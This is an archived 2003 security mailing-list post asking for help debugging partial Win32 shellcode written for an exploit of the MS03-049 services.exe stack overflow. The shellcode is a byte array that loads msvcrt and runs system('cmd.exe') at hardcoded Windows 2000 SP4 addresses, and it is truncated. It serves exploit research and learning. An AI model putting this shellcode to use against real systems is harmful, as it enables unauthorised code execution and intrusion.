Win32 Shellcode question.

From: Vinay A. Maha*** (devnull001_at_fastmail.fm)
Date: 11/28/03

Next message: research_at_symantec.bugtraq.org: "Multiple Remote Issues in Applied Watch IDS Suite (advisory attached)"

Previous message: CORE Security Technologies: "[ANNOUNCE] Python network security tools: Pcapy, Impacket, InlineEgg"
Next in thread: sk: "Re: Win32 Shellcode question."
Reply: sk: "Re: Win32 Shellcode question."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu, 27 Nov 2003 19:29:18 -0800
To: vuln-dev@securityfocus.com, pentest@yahoogroups.com

I was writing an exploit for the MS03-049 services.exe stack overflow
vuln (from scratch for my own academic interest). Here's my shellcode to
simply launch a "cmd.exe" shell.

#define LL 0x7C4F05CF
#define SYS 0x78018EBF

char payload[] = {
0x55, // push ebp
0x8B, 0xEC, // mov ebp,esp

  0x33, 0xC0, // xor eax,eax
  0x50, // push eax
  0x50, // push eax
  0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
         // mov dword ptr [ebp-8],6376736Dh
  0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
         // mov word ptr [ebp-4],7472h
  0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
  0x50, // push eax
  0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL
  0xFF, 0xD0, // call eax <------------ Problem call
  0x8B, 0xE5, // mov esp,ebp

  0x33, 0xC0, // xor eax,eax
  0x50, // push eax
  0x50, // push eax
  0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
         // mov dword ptr [ebp-8],2E646D63h
  0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
         // mov word ptr [ebp-4],7865h
  0xC6, 0x45, 0xFE, 0x65,
         // mov byte ptr [ebp-2],65h
  0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
  0x50, // push eax
  0xB8, 0xBF, 0x8E, 0x01, 0x78,
         // mov eax,SYS
  0xFF, 0xD0, // call eax
...
  };"

After the overflow, I can step through the NOP sled, and reach the above
payload - meaning I have control over the CPU's exec path, and can make
it execute my payload. However, I keep getting an "Access Violation"
writing location.. error inside the "call eax" that corresponds with
LoadLibrary("msvcrt").

I have confirmed the LL and SYS variables for the target (Win2k SP4).
Plus, the payload works just fine when compiled and executed outside of
services.exe . Is there something special about services.exe that
prevents LoadLibraryA from executing normally or what did I do wrong?
Can you spot anything I am overlooking? The same payload has worked on
other stack-overflow exploits, and inside a simple main(){} loop.

Thanks,
Vinay.

Next message: research_at_symantec.bugtraq.org: "Multiple Remote Issues in Applied Watch IDS Suite (advisory attached)"

Previous message: CORE Security Technologies: "[ANNOUNCE] Python network security tools: Pcapy, Impacket, InlineEgg"
Next in thread: sk: "Re: Win32 Shellcode question."
Reply: sk: "Re: Win32 Shellcode question."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]